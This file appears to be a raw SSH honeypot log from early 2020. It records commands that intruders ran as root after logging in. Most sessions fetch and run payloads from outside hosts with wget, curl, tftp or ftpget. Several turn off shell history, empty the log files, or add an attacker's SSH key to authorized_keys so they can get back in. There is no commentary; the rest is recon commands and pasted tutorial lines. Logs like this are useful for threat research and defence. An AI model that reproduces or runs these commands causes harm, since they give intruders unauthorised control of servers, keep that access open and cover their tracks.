File: fakesshd-log-2020.txt


From 5.11.37.63 3-Jan-2020 07:10:48 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk >>/dev/null;rm -rf zyk
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk >>/dev/null
rm -rf zyk

From 5.101.0.209 6-Jan-2020 18:41:09 ssh2 root
Exec echo dssdfsdf|md5sum
echo dssdfsdf|md5sum

From 146.71.22.193 7-Jan-2020 01:46:02 ssh2 root
Exec echo "cd /tmp; wget http://46.246.42.147/wget.sh || curl http://46.246.42.147/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
wget http://46.246.42.147/wget.sh || curl http://46.246.42.147/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 159.203.90.161 12-Jan-2020 19:06:14 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;perl zyk;rm -rf zyk
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
perl zyk
rm -rf zyk

From 199.200.21.254 16-Jan-2020 23:23:18 ssh2 root
Exec curl -o /tmp/dl.sh http://129.121.176.89/autodl.sh & /bin/sh /tmp/dl.sh

curl -o /tmp/dl.sh http://129.121.176.89/autodl.sh
/bin/sh /tmp/dl.sh

From 202.70.66.228 21-Jan-2020 17:06:10 ssh2 root
Exec uname -a && lscpu 
uname -a
lscpu
Exec uname -a && lscpu 
uname -a
lscpu

From 202.70.66.228 21-Jan-2020 17:07:12 ssh2 root
Exec uname -a && lscpu 
uname -a
lscpu

From 103.16.223.254 21-Jan-2020 23:31:05 ssh2 root
Exec uname -a && lscpu
uname -a
lscpu
Exec uname -a && lscpu
uname -a
lscpu

From 80.211.45.156 22-Jan-2020 08:25:39 ssh2 root
Exec uname -a && echo RAM: && free -mt && echo && echo && echo Procesoare: && grep -c ^processor /proc/cpuinfo && echo && echo UPTIME: && uptime 
uname -a
echo RAM:
free -mt
echo
echo
echo Procesoare:
grep -c ^processor /proc/cpuinfo
echo
echo UPTIME:
uptime

From 159.203.90.161 22-Jan-2020 14:26:54 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk

From 159.203.90.161 22-Jan-2020 14:43:06 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk

From 159.203.90.161 22-Jan-2020 14:45:23 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;killall -9 perl;cd /var/tmp;cd /tmp;wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk;perl zyk;rm -rf zyk
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
killall -9 perl
cd /var/tmp
cd /tmp
wget -q --timeout=15 --tries=2 203.146.208.208/drago/images/.ssh/.ssh/zyk || curl --connect-timeout 15 -s -O -f 203.146.208.208/drago/images/.ssh/.ssh/zyk
perl zyk
rm -rf zyk

From 37.8.19.187 24-Jan-2020 02:03:04 ssh2 root
ls
ls Mail
ls nsmail
.

From 82.165.197.136 24-Jan-2020 16:26:30 ssh2 root
ls
screen
apt
apt install screen
screen
screen
bash screen
cd /usr/bin
s
ls
cd /
ls
python 0v
for logs in `find /var/log -type f`
do > $logs
done
cat /dev/null > ~/.bash_history
history -c
export HISTFILE=/dev/null unset HISTFILE unset HISTSIZE unset HISTTIME unset HISTFILESIZE echo > /var/log/btmp exit
exit

From 37.8.19.187 26-Jan-2020 01:27:18 ssh2 root
free -m

From 37.8.19.187 26-Jan-2020 02:36:02 ssh2 root
ÙØ³
ls
test.pl
ls test.pl

From 95.138.142.48 28-Jan-2020 15:02:27 ssh2 root
Exec echo "PROC:`grep -c ^processor /proc/cpuinfo` VER:`uname -a`"
echo "PROC:`grep -c ^processor /proc/cpuinfo` VER:`uname -a`"

From 85.184.243.37 29-Jan-2020 22:39:27 ssh2 root
free -m
ls

From 37.8.16.184 2-Feb-2020 00:50:13 ssh2 root
ls
w
free -g
yum install hydra -y
apt-get update
wget http://61.91.57.222/iscan.jpg
curl -O http://61.91.57.222/iscan.jpg
cd ..
ls
passwd

From 82.205.30.31 5-Feb-2020 00:17:14 ssh2 root
passwd root
password root

From 82.205.30.31 5-Feb-2020 00:20:34 ssh2 root
nano /etc/hosts
./nano /etc/hosts
vi /etc/hosts
./vi /etc/hosts
127.0.0.1 localhost.localdomain localhost SERVER01
./127.0.0.1 localhost.localdomain localhost SERVER01
sudo ifconfig | head -n 2 | tail -n 1 | tr -s " " | tr " " ":" | cut -d":" -f 4
sudo ifconfig | head -n 2 | tail -n 1 | tr -s " " | tr " " ":" | cut -d":" -f 4

From 82.205.30.31 5-Feb-2020 00:22:01 ssh2 root
sudo ifconfig | head -n 2 | tail -n 1 | tr -s " " | tr " " ":" | cut -d":" -f 4
/sbin/ifconfig $(/sbin/route -n | awk '$1 == "0.0.0.0" {print $8}') | awk 'match($0, /inet addr:[.0-9]+/) {print substr($0, RSTART+10, RLENGTH-10)}'
/sbin/ip addr show eth0 | awk -F"[ /]+" '/inet / {print $3}'

From 82.205.30.31 5-Feb-2020 00:23:27 ssh2 root
ipadm show-addr net0/v4 | awk -F"[ /]+" '/ok/ {print $5}'
./ipadm show-addr net0/v4 | awk -F"[ /]+" '/ok/ {print $5}'
ipconfig getifaddr en0
ifconfig eth0 | awk -F"[ :]+" '/inet / {print $4}'
getent hosts "$(hostname)" | awk '{ print $1 }'
ip route get 1.2.3.4
74.125.139.102 via 192.168.0.1 dev wlan0 src 192.168.0.24 cache
74.125.139.102 via 192.168.0.1 dev wlan0 src 192.168.0.24
ip route get 1.2.3.4 | grep -oP '(?<=src )\S+'
grep -oP '(?<=src )\S+'
grep -oP '(?<=via )\S+')"

From 82.205.30.31 5-Feb-2020 00:24:53 ssh2 root
ip route get "$(ip route show to 0/0 | grep -oP '(?<=via )\S+')"
ip route get "$(ip route show to 0/0 | grep -oP '(?<=via )\S+')" | grep -oP '(?<=src )\S+'
$cfg['Servers'][$i]['password'] ="
$cfg['Servers'][$i]['password'] = 'Type your root password here'
umount /dev/sdb
$ curl -I -s myapplication:5000
curl -I -s myapplication:5000
curl -I -s database:27017
$ curl -I -s database:27017
$ cat test.json | python -m json.tool
cat test.json | python -m json.tool
./cat test.json | python -m json.tool
./myapp
./myapp: Permission denied
-rw-r--r--. 1 root root 33 Jul 21 18:36 myapp
tail -f /var/log/httpd/access_log

From 82.205.30.31 5-Feb-2020 00:30:20 ssh2 root
tail -f /var/log/httpd/access_log
tail -n 100 /var/log/httpd/access_log
$ tail -n 100 /var/log/httpd/access_log
$ cat requirements.txt flask flask_pymongo
$ cat tomcat.log | grep org.apache.catalina.startup.Catalina.start
$ ps -ef
du -sh /var/log/*
/var/log/anaconda
/sys/fs/selinux
./sys/fs/selinux
fsck /dev/sdb
# fsck /dev/sdb

From 82.205.30.31 5-Feb-2020 00:32:47 ssh2 root
sudo apt-get update
sudo apt-get dist-upgrade

From 193.105.134.45 5-Feb-2020 00:33:05 ssh2 root
ifconfig eth0 down
ifconfig eth0 up
ifconfig eth0 192.168.1.12
ifconfig eth0 192.168.1.1
ifconfig eth0 netmask 255.255.255.
ifconfig eth0 broadcast 192.168.1.255
ifconfig eth0 192.168.1.12 netmask 255.255.255.0 broadcast 192.168.1.255
netstat -an

From 82.205.30.31 5-Feb-2020 00:34:37 ssh2 root
netstat -c
nslookup tecmint.com
nslookup -query=mx tecmint.com
dig tecmint.com +noall
uptime
wall "we will be going down for maintenance for one hour sharply at 03:30 pm"
mesg [n|y]
Øº
y
write ravisaive
talk ravisaive
w

From 82.205.30.31 5-Feb-2020 00:36:04 ssh2 root
Give the file names a1, a2, a3, a4.....1213
rename a1 a0 a?
top
Mkfs.ext4 /dev/sda1
Mkfs.ext4 /dev/sda1 (sda1 block will be formatted)
mkfs.ext4 /dev/sdb1 (sdb1 block will be formatted)
touch a.txt (creates a text file a.txt)
alias cp='rsync -aP'
rsync -zvr IMG_5267\ copy\=33\ copy\=ok.jpg ~/Desktop/
free
free -b

From 82.205.30.31 5-Feb-2020 00:37:30 ssh2 root
free -k
free -m
free -g
free -h
free -s 3
mysqldump -u root -p --all-databases > /home/server/Desktop/backupfile.sql
mkpasswd -l 10
mkpasswd -l 20
yum install expect
apt-get install expect

From 82.205.30.31 5-Feb-2020 00:38:46 ssh2 root
lsof
cat test.txt
more /etc/passwd
cat /etc/passwd | more
ps -ef | more
less /etc/passwd
cat /etc/passwd | less
ps -ef | less
passwd

From 82.205.30.31 5-Feb-2020 00:40:12 ssh2 root
passwd -S
Only root can do that.
sudo passwd -S khess
sudo passwd khess
sudo passwd -l john
ifconfig
grep 192.168.10. *
grep -R 192.168.10. *
ps -ef |grep systemd

From 82.205.30.31 5-Feb-2020 00:41:38 ssh2 root
ps -ef | grep systemd | grep -v grep
grep -iR bob *
ps -ef | grep systemd | grep -v grep | awk '{print $2}'
cat test.txt | awk -F "," '{print $3}'
$ curl -I -s myapplication:5000
curl -I -s myapplication:5000
curl -I -s database:27017
$ curl -I -s https://opensource.com
cat test.json

From 82.205.30.31 5-Feb-2020 00:43:05 ssh2 root
$ cat test.json
$ cat test.json | python -m json.tool
cat test.json | python -m json.tool
$ cat test.json | jq
cat test.json | jq
./myapp
$ ./myapp
$ tail -n 100 /var/log/httpd/access_log
ls
pwd
uname
echo âhiâ
who
history
cd /dev/
ls
dd if=/dev/cdrom1 of=/home/avi/Desktop/squeeze.iso

From 82.205.30.31 5-Feb-2020 00:44:31 ssh2 root
ping www.google.com
su
stat 34.odt
~$ stat 34.odt
`34.odt'
# echo "Tecmint [dot] com is the world's best website for qualitative Linux article" | pv -qL 20
echo "Tecmint [dot] com is the world's best website for qualitative Linux article" | pv -qL 20
./echo "Tecmint [dot] com is the world's best website for qualitative Linux article" | pv -qL 20
~$ mount | column -t
/dev/sda1
/dev/sda1 on /

From 82.205.30.31 5-Feb-2020 00:45:57 ssh2 root
./long-unix-script.sh
screen ./long-unix-script.sh
./long-unix-script.sh
./long-unix-script.sh
screen -r 4980.pts-0.localhost
-r 4980.pts-0.localhost
file 34.odt
id
uid=1000(avi) gid=1000(avi) groups=1000(avi),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),117(scanner)

From 82.205.30.31 5-Feb-2020 00:50:16 ssh2 root
ls
df -h
df -h /home
df -h | awk '{print $5 " " $6}' | sort -n | tail -5
du -h -s /var/log
du -h -s /var/log 9,6M /var/log
>/var/log/syslog
/var/log/syslog
for I in `ls "/var/log/*.log"`
do >"$I"
done
ls -l /var/log | wc -l

From 82.205.30.31 5-Feb-2020 00:51:42 ssh2 root
du -k /var/log | sort -n | tail -5
ls -lSr
du -ch /var/log/*.log | grep total
find . -type f -size +100M -ls

From 82.205.30.31 5-Feb-2020 00:53:20 ssh2 root
Sudoers allows particular users to run various commands as
guest1=/usr/local/bin/myprog
ruser ALL=(ALL) ALL
guest1=/usr/local/bin/myprog
guest1=NOPASSWORD : /usr/local/bin/myprog
Allow root to run any commands anywhere

From 82.205.30.31 5-Feb-2020 00:54:55 ssh2 root
root ALL=(ALL) ALL
Allow kam user to execute iptables
tcpdump commands
Username Hostname= command1,command2
/sbin/iptables, /usr/sbin/tcpdump
/usr/sbin/tcpdump
./usr/sbin/tcpdump
[user] ALL=(ALL) [command_absolute_path] [file_list_seperated_via_comma]
Oracle ALL=(ALL) /bin/ls /opt/oracle.ExaWatcher/archive

From 82.205.30.31 5-Feb-2020 00:56:13 ssh2 root
.
..
.
..
.
..
.
.
.
.
.
.
.
.
.
.
.
........................
.
.
.
.
.
..

From 118.69.35.149 5-Feb-2020 07:38:18 ssh2 root
Exec echo "cd /tmp; wget http://46.246.37.212/wget.sh || curl http://46.246.37.212/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
wget http://46.246.37.212/wget.sh || curl http://46.246.37.212/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 148.66.133.228 5-Feb-2020 14:02:22 ssh2 root
Exec cd /tmp;wget http://64.71.162.239/.sshd;curl -O http://64.71.162.239/.sshd;chmod +x .sshd;./.sshd;sleep 20;wget http://64.71.162.239/.zu;perl .zu;rm -rf .zu;history -rc
cd /tmp
wget http://64.71.162.239/.sshd
curl -O http://64.71.162.239/.sshd
chmod +x .sshd
./.sshd
sleep 20
wget http://64.71.162.239/.zu
perl .zu
rm -rf .zu
history -rc

From 5.62.18.98 5-Feb-2020 22:16:20 ssh2 root
yum install redhat-lsb
/etc/centos-release
/etc/os-release
/etc/redhat-release
/etc/system-release
cat /etc/redhat-release
cat /etc/centos-release
cat /etc/os-release
cat /etc/system-release
rpm -ql centos-release | grep release$
rpm -qf /etc/redhat-release
uname -s -r

From 193.105.134.45 5-Feb-2020 22:17:45 ssh2 root
uname -a
uname -v
rpm -q --verify kernel-3.10.0-693.21.1.el7.x86_64
hostnamectl
yum install redhat-lsb
lsb_release -d
lsb_release -r
lsb_release -a
cat /boot/grub2/grub.cfg | grep -w menuentry
grep saved_entry /boot/grub2/grubenv
cat /boot/grub/grub.conf | grep title

From 190.211.254.116 7-Feb-2020 04:07:22 ssh2 root
Exec cat /etc/motd
cat /etc/motd

From 159.203.161.141 7-Feb-2020 20:25:09 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.83/servicesd000/fx19.x86; cat fx19.x86 > sshserverruntime; chmod +x sshserverruntime; ./sshserverruntime ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.148.10.83/servicesd000/fx19.x86
cat fx19.x86 > sshserverruntime
chmod +x sshserverruntime
./sshserverruntime ROOTED
history -c

From 45.148.10.93 7-Feb-2020 21:58:22 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.83/servicesd000/fx19.x86; cat fx19.x86 > up-to-date01; chmod +x *; ./up-to-date01 ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.148.10.83/servicesd000/fx19.x86
cat fx19.x86 > up-to-date01
chmod +x *
./up-to-date01 ROOTED
history -c

From 139.59.56.121 8-Feb-2020 02:04:00 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd;mkdir .ssh;cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >>.ssh/.auth_k;echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/.auth_k;mv .ssh/.auth_k .ssh/authorized_keys;cd
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd
mkdir .ssh
cat .ssh/authorized_keys|grep -v 'heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >>.ssh/.auth_k
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAvN5GkpS25Z9eA2bARaXTVfVN2m/N5V5ddOTyVPftA3ljorQitmh1pyuZDty9oTWF+J0cOtGBvRaQ7NvZCaDC2q6QR0iMOfq7zs+4bl8WO8UnaQcVVIBeEt3YPo8PXwVm5fR4wgoq9SZp29/2jFz0UmAOhiUyImh9/P7jFWqpv3gSxZ8neq+4pSCUfE24OGiFBpJGkAE+wMmJcBX0WjFfjedcbBs1FO/C+x8WY9bFkQ3NwwjVbh3c3mYy9zqdPhm6GI/heVAZUWSKHausOwb+Rem+eKhkrKvoeteqJXEIrlLbHyRHn+12nN/qgG5kIcICv4TRD59GHMYZH3ILngyFJQ==' >> .ssh/.auth_k
mv .ssh/.auth_k .ssh/authorized_keys
cd

From 45.148.10.173 8-Feb-2020 08:37:43 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.92/cv0la/5531sx3.x86; cat 5531sx3.x86 > devel-date-new; chmod +x devel-date-new; ./devel-date-new ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.148.10.92/cv0la/5531sx3.x86
cat 5531sx3.x86 > devel-date-new
chmod +x devel-date-new
./devel-date-new ROOTED
history -c

From 45.148.10.173 8-Feb-2020 14:30:08 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.83/servicesd000/fx19.x86; cat fx19.x86 > devel-date-new; chmod +x devel-date-new; ./devel-date-new ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.148.10.83/servicesd000/fx19.x86
cat fx19.x86 > devel-date-new
chmod +x devel-date-new
./devel-date-new ROOTED
history -c

From 159.203.117.137 9-Feb-2020 21:43:16 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.83/servicesd000/fx19.x86; cat fx19.x86 > sshdsservers; chmod +x sshdsservers; ./sshdsservers ROOTED; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://45.148.10.83/servicesd000/fx19.x86
cat fx19.x86 > sshdsservers
chmod +x sshdsservers
./sshdsservers ROOTED
history -c

From 209.141.60.108 11-Feb-2020 08:23:34 ssh2 root
Exec nproc;uname -a;curl -O http://arhive.altervista.org/n.pl ; perl n.pl ; rm -rf n.pl; history -nc
nproc
uname -a
curl -O http://arhive.altervista.org/n.pl
perl n.pl
rm -rf n.pl
history -nc

From 46.246.45.171 11-Feb-2020 20:40:44 ssh2 root
Exec cd /tmp; wget http://ardp.hldns.ru/wget.sh -O -> wget.sh; chmod +x wget.sh; ./wget.sh
cd /tmp
wget http://ardp.hldns.ru/wget.sh -O -> wget.sh
chmod +x wget.sh
./wget.sh

From 150.136.239.204 12-Feb-2020 06:56:06 ssh2 root
Exec w ; nproc ; uname -a ; wget radiodeea.hi2.ro/asp.db ; chmod +x * ; perl asp.db ; curl -O radiodeea.hi2.ro/asp.db ; chmod +x * ; perl asp.db ; rm -rf asp.db ;rm -rf asp* ; history -c 
w
nproc
uname -a
wget radiodeea.hi2.ro/asp.db
chmod +x *
perl asp.db
curl -O radiodeea.hi2.ro/asp.db
chmod +x *
perl asp.db
rm -rf asp.db
rm -rf asp*
history -c

From 159.203.90.161 13-Feb-2020 19:59:11 ssh2 root
Exec uname -a;unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH;history -n;export HISTFILE=/dev/null;export HISTSIZE=0;export HISTFILESIZE=0;cd /var/tmp;cd /tmp;rm -rf kik.pl;wget -q 128.199.224.178/wp-admin/images/kik.pl || curl -s -O -f 128.199.224.178/wp-admin/images/kik.pl;perl kik.pl;rm -rf kik.pl
uname -a
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH
history -n
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0
cd /var/tmp
cd /tmp
rm -rf kik.pl
wget -q 128.199.224.178/wp-admin/images/kik.pl || curl -s -O -f 128.199.224.178/wp-admin/images/kik.pl
perl kik.pl
rm -rf kik.pl

From 45.148.10.91 13-Feb-2020 22:03:30 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://104.248.150.167/servicesd000/fx19.x86; cat fx19.x86 > ssh-xuma19; chmod +x ssh-xuma19; ./ssh-xuma19 r00ted; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://104.248.150.167/servicesd000/fx19.x86
cat fx19.x86 > ssh-xuma19
chmod +x ssh-xuma19
./ssh-xuma19 r00ted
history -c

From 203.138.172.104 14-Feb-2020 15:13:16 ssh2 root
Exec echo "cd /tmp; wget http://46.246.45.171/wget.sh || curl http://46.246.45.171/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
wget http://46.246.45.171/wget.sh || curl http://46.246.45.171/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 149.129.58.243 14-Feb-2020 18:22:13 ssh2 root
Exec echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && rm *.sh; wget http://46.246.45.171/bin.sh || curl http://46.246.45.171/curl.sh -o curl.sh || chmod +x *.sh; ./bin.sh; ./curl.sh' | sh
echo 'cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm *.sh
wget http://46.246.45.171/bin.sh || curl http://46.246.45.171/curl.sh -o curl.sh || chmod +x *.sh
./bin.sh
./curl.sh' | sh

From 45.148.10.99 15-Feb-2020 17:43:12 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://104.248.150.167/servicesd000/fx19.x86; cat fx19.x86 > sshupdate; chmod +x *; ./sshupdate r00ted; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://104.248.150.167/servicesd000/fx19.x86
cat fx19.x86 > sshupdate
chmod +x *
./sshupdate r00ted
history -c

From 45.148.10.143 16-Feb-2020 05:43:49 ssh2 root
Exec cd /tmp; wget http://45.148.10.86/as12a0s/z2s234.x86; curl -O http://45.148.10.86/as12a0s/z2s234.x86;cat z2s234.x86 > ssh-updater; chmod +x *; ./ssh-updater rooted
cd /tmp
wget http://45.148.10.86/as12a0s/z2s234.x86
curl -O http://45.148.10.86/as12a0s/z2s234.x86
cat z2s234.x86 > ssh-updater
chmod +x *
./ssh-updater rooted

From 200.91.223.142 17-Feb-2020 03:43:34 ssh2 root
Exec echo "cd /tmp; wget http://46.246.35.148/wget.sh || curl http://46.246.35.148/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
wget http://46.246.35.148/wget.sh || curl http://46.246.35.148/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 5.13.139.200 18-Feb-2020 15:24:46 ssh2 root
ls
wget nasapaul.com/ninfo
ls
nrpoc
nproc
passwd
cat /os/release
cat
./uptime

From 191.234.160.243 18-Feb-2020 15:25:40 ssh2 root
Exec uname -a ; lscpu
uname -a
lscpu
cat /etc/passwd

From 218.237.207.4 20-Feb-2020 02:07:34 ssh2 root
Exec cat /etc/issue ; cd /tmp || cd /run || cd /; wget http://89.42.133.67/axisbins.sh; chmod 777 axisbins.sh; sh axisbins.sh; tftp 89.42.133.67 -c get axistftp1.sh; chmod 777 axistftp1.sh; sh axistftp1.sh; tftp -r axistftp2.sh -g 89.42.133.67; chmod 777 axistftp2.sh; sh axistftp2.sh; rm -rf axisbins.sh axistftp1.sh axistftp2.sh; rm -rf * ; history -c
cat /etc/issue
cd /tmp || cd /run || cd /
wget http://89.42.133.67/axisbins.sh
chmod 777 axisbins.sh
sh axisbins.sh
tftp 89.42.133.67 -c get axistftp1.sh
chmod 777 axistftp1.sh
sh axistftp1.sh
tftp -r axistftp2.sh -g 89.42.133.67
chmod 777 axistftp2.sh
sh axistftp2.sh
rm -rf axisbins.sh axistftp1.sh axistftp2.sh
rm -rf *
history -c

From 106.110.233.186 21-Feb-2020 02:13:46 ssh2 root
Exec echo "cd /tmp; wget http://46.246.45.213/wget.sh || curl http://46.246.45.213/curl.sh -o curl.sh; chmod +x *.sh; ./wget.sh; ./curl.sh" | sh
echo "cd /tmp
wget http://46.246.45.213/wget.sh || curl http://46.246.45.213/curl.sh -o curl.sh
chmod +x *.sh
./wget.sh
./curl.sh" | sh

From 128.199.175.116 21-Feb-2020 05:04:20 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://45.148.10.95/kuma-ssh-update.sh; curl -O http://45.148.10.95/kuma-ssh-update.sh; chmod 777 kuma-ssh-update.sh; sh kuma-ssh-update.sh; tftp 45.148.10.95 -c get kuma-ssh-update.sh; chmod 777 kuma-ssh-update.sh; sh kuma-ssh-update.sh; tftp -r kuma-ssh-update2.sh -g 45.148.10.95; chmod 777 kuma-ssh-update2.sh; sh kuma-ssh-update2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.148.10.95 kuma-ssh-update1.sh kuma-ssh-update1.sh; sh kuma-ssh-update1.sh; rm -rf kuma-ssh-update.sh kuma-ssh-update.sh kuma-ssh-update2.sh kuma-ssh-update1.sh; rm -rf *; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
